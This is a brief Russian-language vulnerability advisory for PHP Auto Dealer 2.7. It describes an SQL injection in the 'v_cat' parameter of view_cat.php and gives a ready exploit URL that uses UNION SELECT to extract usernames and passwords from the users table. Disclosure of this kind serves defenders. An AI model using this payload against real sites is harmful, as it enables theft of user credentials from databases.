Программа: PHP Auto Dealer 2.7

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «v_cat» сценарием view_cat.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

www.TraGeT./view_cat.php?v_cat=-1/**/UNION/**/SELECT/* */CONCAT_WS(0x3a,username,password)MrSQL/**/FROM/**/users/**/limit+1,1—



Оставить мнение